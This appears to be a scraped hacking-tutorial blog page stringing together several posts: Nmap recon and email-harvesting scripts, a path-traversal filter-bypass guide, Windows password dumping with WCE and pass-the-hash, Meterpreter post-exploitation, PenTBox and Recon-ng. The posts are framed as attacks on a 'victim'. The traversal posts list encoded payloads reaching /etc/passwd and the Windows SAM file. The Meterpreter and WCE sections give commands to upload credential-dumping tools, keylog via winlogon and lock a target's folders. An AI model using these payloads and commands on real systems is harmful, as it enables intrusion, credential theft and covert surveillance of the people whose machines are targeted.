Use NMAP as a Information gathering tool

Usually we use NMAP as a port scanner to find open port of web-server, But with help of this Tool we can also gather Information about victim using NMAP script. In this tutorial we use NMAP to gather information.

(1) Use NMAP to determine I.P. Address of victim:- NMAP include two scripts in his database.

nmap --script ip-geolocation-* host-name

As we can see that it show co-ordinate & location of our target.

(2)Use NMAP as Whois Tool:- Following Command is used to find whois information about victim

nmap --script whois host-name

(3)Use NMAP for Email Harvesting:- There are two script for email harvesting.

• Http-google-email
• http-email-harvesting

Http-email-harvesting is official repository in nmap . But if you want to use Google webs & Google Group to find Email then you should Download Http-google-email from here.

Use Following command to find email Address

nmap -p80 --script http-email-harvest host-name

(4)Use NMAP as Brute Force DNS:- DNS recor contain useful information about website. There are many tools available for this purpose , But you can also use nmap for simple DNS Brute Force Attack.

Use Following command

nmap -p80 --script dns-brute host-name

(5)Discovering Additional Host-name:- we can find additional host which has same I.p. Address using simple nmap script. It can help us to find web-application which hosted on same I.p. Address.

Download this nse script from here.

You can aslo use following script code

nmap --script http-robtex-reverse-ip --script-args http-robtex-reverse-ip.host='ip'

Read More

How to Bypassing Filter to Traversal Attacks ?

Bypassing Filter to Traversal Attacks

If your initial attempts to perform a traversal attack, as described previously, are unsuccessful, this does not mean that the application is not vulnerable. Many application developers are aware of path traversal vulnerabilities and implement various kinds of input validation checks in an attempt to prevent them. However, those defenses are often flawed and can be bypassed by a skilled attacker.

The first type of input filter commonly encountered involves checking

whether the filename parameter contains any path traversal sequences, and if so, either rejects the request or attempts to sanitize the input to remove the sequences. This type of filter is often vulnerable to various attacks that use alternative encodings and other tricks to defeat the filter. These attacks all exploit the type of canonicalization problems faced by input validation mechanisms

Always try path traversal sequences using both forward slashes and

backslashes. Many input filters check for only one of these, when the file system may support both.

Try simple URL-encoded representations of traversal sequences, using

the following encodings. Be sure to encode every single slash and dot

within your input:

dot                            %2e

forward slash           %2f

backslash                  %5c

Try using 16-bit Unicode–encoding:

dot                           %u002e

forward slash          %u2215

backslash                %u2216

Try double URL–encoding:

dot                        %252e

forward slash         %252f

backslash                %255c

Try overlong UTF-8 Unicode–encoding:

dot                        %c0%2e       %e0%40%ae    %c0ae etc.

forward slash        %c0%af       %e0%80%af      %c0%2f etc.

backslash              %c0%5c       %c0%80%5c      etc.

You can use the illegal Unicode payload type within Burp Intruder to generate a huge number of alternate representations of any given character, and submit this at the relevant place within your target parameter. These are representations that strictly violate the rules for Unicode representation but are nevertheless accepted by many implementations of Unicode decoders, particularly on the Windows platform.

If the application is attempting to sanitize user input by removing traversal sequences, and does not apply this filter recursively, then it may be possible to bypass the filter by placing one sequence within another. For example:

....//

....\/

..../\

....\\

The second type of input filter commonly encountered in defenses against path traversal attacks involves verifying whether the user-supplied filename contains a suffix (i.e., file type) or prefix (i.e., starting directory) that the application is expecting.

Some applications check whether the user-supplied file name ends in a

particular file type or set of file types, and reject attempts to access anything else. Sometimes this check can be subverted by placing a URL encoded null byte at the end of your requested filename, followed by a file type that the application accepts.

For example:

../../../../../boot.ini.jpg

The reason this attack sometimes succeeds is that the file type check

is implemented using an API in a managed execution environment

in which strings are permitted to contain null characters (such as

String.endsWith() in Java). However, when the file is actually retrieved, the application ultimately uses an API in an unmanaged environment in which strings are null-terminated and so your file name is effectively truncated to your desired value.

A different attack against file type filtering is to use a URL-encoded newline character. Some methods of file retrieval (usually on Unix-based platforms) may effectively truncate your file name when a newline is encountered:

../../../../../etc/passwd%0a.jpg

Some applications attempt to control the file type being accessed by

appending their own file type suffix to the filename supplied by the user. In this situation, either of the preceding exploits may be effective, for the same reasons.

Some applications check whether the user-supplied file name starts with a particular subdirectory of the start directory, or even a specific file name. This check can of course be trivially bypassed as follows:

wahh-app/images/../../../../../../../etc/passwd

If none of the preceding attacks against input filters are successful individually, it may be that the application is implementing multiple types of filters, and so you need to combine several of these attacks simultaneously (both against traversal sequence filters and file type or directory filters). If possible, the best approach here is to try to break the problem down into separate stages. For example, if the request for

diagram1.jpg

is successful, but the request for

foo/../diagram1.jpg

fails, then try all of the possible traversal sequence bypasses until a variation on the second request is successful. If these successful traversal sequence bypasses don’t enable you to access /etc/passwd, probe whether any file type filtering is implemented and can be bypassed, by requesting

diagram1.jpg.jpg

Working entirely within the start directory defined by the application, try to probe to understand all of the filters being implemented, and see whether each can be bypassed individually with the techniques described.

Of course, if you have white box access to the application, then your task is much easier, because you can systematically work through different types of input and verify conclusively what filename (if any) is actually reaching the file system.

Read More

Path traversal vulnerabilities Tutorial

Path traversal vulnerabilities arise when user-controllable data is used by the application to access files and directories on the application server or other back-end file system in an unsafe way. By submitting crafted input, an attacker Exploiting Path Traversal may be able to cause arbitrary content to be read from, or written to, anywhere on the file system being accessed. This often enables an attacker to read sensitive information from the server, or overwrite sensitive files, leading ultimately to arbitrary command execution on the server.

Consider the following example, in which an application uses a dynamic page to return static images to the client. The name of the requested image is specified in a query string parameter:

https://wahh-app.com/scripts/GetImage.aspx?file=diagram1.jpg

When the server processes this request, it performs the following steps:

1. Extracts the value of the file parameter from the query string.

2. Appends this value to the prefix C:\wahh-app\images\.

3. Opens the file with this name.

4. Reads the file’s contents and returns it to the client.

The vulnerability arises because an attacker can place path traversal

sequences into the file name in order to backtrack up from the image directory specified in step 2 and so access files from anywhere on the server. The path traversal sequence is known as “dot-dot-slash,” and a typical attack would look like this:

https://wahh-app.com/scripts/GetImage.aspx?file=..\..\windows\repair\sam

When the application appends the value of the file parameter to the name of the images directory, it obtains the following path:

C:\wahh-app\images\..\..\winnt\repair\sam

The two traversal sequences effectively step back up from the images directory to the root of the C: drive, and so the preceding path is equivalent to this: C:\winnt\repair\sam

Hence, instead of returning an image file, the server actually returns the repair copy of the Windows SAM file. This file may be analyzed by the attacker to obtain usernames and passwords for the server operating system.

In this simple example, the application implements no defenses to prevent path traversal attacks. However, because these attacks have been widely known about for some time, it is common to encounter applications that implement various defenses against them, often based on input validation filters. As you will see, these filters are often poorly designed and can be bypassed by a skilled attacker.

Read More

How to get windows passwords in plain text?

Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).

The tool allows users to:

• Perform Pass-the-Hash on Windows
• 'Steal' NTLM credentials from memory (with and without code injection)
• 'Steal' Kerberos Tickets from Windows machines
• Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
• Dump cleartext passwords stored by Windows authentication packages

WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.

After hack remote computer upload wce to victim computer using metasploit

(1)Type following command in meterpreter session.

Upload /pentest/passwords/wce/wce.exe .
(2)Now type shellto get cmd of victim pc
(3)Type wce.exe -wto get password in clear text

List NTLM credentials in memory?

By default, WCE lists NTLM credentials in memory, no need to specify any options.
For example:
C:\Users\test>wce.exe

How to Change my current NTLM credentials?

wce.exe -s <username>:<domain>:<lmhash>:<nthash>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CB6948805F797BF2A82807973B89537
NTLM credentials successfully changed!

How to Create a new logon session and launch a program with new NTLM credentials?

wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe

How to generate NTLM hashes with WCE? 

wce.exe -g <cleartext password>
For example:
C:\Users\test>wce.exe -g mypassword
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Password: mypassword
Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7 

If you want to know more about how its work , Download P.D.F. file from Below.
(1)P.D.F -1
(2)P.D.F.-2

If you only need clear text password not logon sessions and any other
you can use mimikatz to get clear text password.

Read More

Pentbox installation & use:-

PenTBox is a Security Suite that packs security and stability testing oriented tools for networks and systems.Programmed in Ruby and oriented to GNU/Linux systems, but compatible with Windows, MacOS and every systems where Ruby works.

Main Features:-

- Cryptography tools

• Base64 Encoder & Decoder
• Multi-Digest (MD5, SHA1, SHA256, SHA384, SHA512, RIPEMD-160)
• Hash Password Cracker (MD5, SHA1, SHA256, SHA384, SHA512, RIPEMD-160)
• Secure Password Generator

- Network tools

• Net DoS Tester
• TCP port scanner
• Honeypot
• Fuzzer
• DNS and host gathering
• MAC address geolocation (samy.pl)

- Web

• HTTP directory bruteforce
• HTTP common files bruteforce

How to install pentbox?

As mention earlier this framework is compatible in any system where ruby works.

So you have to install ruby in your system to use this tool.

svn co https://pentbox.svn.sourceforge.net/svnroot/pentbox/trunk/ pentbox

cd pentbox

svn update

./pentbox.rb

Cryptography tool:-

web application penetration tests we often discover encoded Base64 strings. Such strings can contain important information that’s why we need to have a decoder in our tool repository.

If in some situation we obtain password in hash form , then pentbox has inbuilt module that can crack hash into plain text , it can also encrypt plain text in hash form. Supported hash are MD5, SHA1, SHA256, SHA384, SHA512, RIPEMD-160.

Network tools:-
Available modules are Net DoS Tester TCP port scanner ,Honeypot,Fuzzer,DNS and host gathering,MAC address geolocation . For tcp port scan you should use NMAP , because it `s best tool for port scanning.
I like DNS and host gathering modules. It `s very fast & responsive.

Web tools:-
This section contain two tools for information gathering.
HTTP directory brute-force (You can find directory of website)
HTTP common files brute-force .

Read More

Metasploit Post Exploitation Methods

(A)Hide File in victim `s P.C:-

After successfully got meterpreter sessions you can hide any file in victim `s P.C. Type following attribute.

attrib +h +r +s drivename:/Foldername

For example you want to hide folder name “songs” in F drive then just type following command in your terminal.

shell

attrib +h +r +s F:/songs

For unhidden file attrib -h -r -s F:/songs

(B)Get passwords of remote windows P.C:-

After getting meterpreter session type ps command it will display list of running process. Now we should migrate meterpreter session to any running process with their process i.d.

In this example we will migrate meterpreter session to winlogon.exe which process i.d. Is 600.

Type following command in your terminal.

migrate 600

Keyscan_start – to start the keylogger

Keyscan_dump – to print captured keystrokes

Keyscan_stop – to stop the keylogger

(C)Remote Windows password in plain text :-

Type following command in your meterpreter session.

Upload /pentest/passwords/wce/wce.exe

shell

wce.exe -w

(D)Lock Folder in Remote P.C. :-

After getting meterpreter  session type following command.

Cacls (Folder Name) /e /p everyone:n

This will lock your folder.

For unlock

Cacls (Folder Name) /e /p everyone:f

Here is more method of post exploitation.

Read More

How to install & use Recon-ng?

Recon-ng is a true framework whose interface is modeled after the very popular and powerful Metasploit Framework. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.


-->

Recon-ng is not intended to compete with any existing framework, as it was designed exclusively for web-based reconnaissance. recon-ng which can perform web-based reconnaissance and it can be used in social engineering engagements or for extracting information that exists on the web.

How to install Recon-ng ?

git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git

cd recon-ng

./recon-ng.py

Discovering Contact with help of Recon-ng?

type help in the framework in order to see a list with all the available commands.

-->

We can see that there is a command named modules.We will type that command to check the existing modules that we can use.In the next image you can see a sample of the available modules.

-->

Here is a module called contacts_jigsaw. Jigsaw is a website similar to Linkedin that contains a large database of business contacts. So let’s say that we want to discover the contacts of a company that exists on jigsaw. We will load the module with the command load contacts_jigsaw and we will set the domain of our preference.

-->

Discover additional Domain of same company?

we can try to use the Google module to discover additional domains of the same company. In this example I am using netcraft modules.

-->

Recon-ng gives us also the ability to extract the results in CSV format or in an HTML file.

-->

This tool is really simple to use and it holds every result in its database for later use.The report that generates is well formatted and if in the future additional modules will added on the framework.

Read More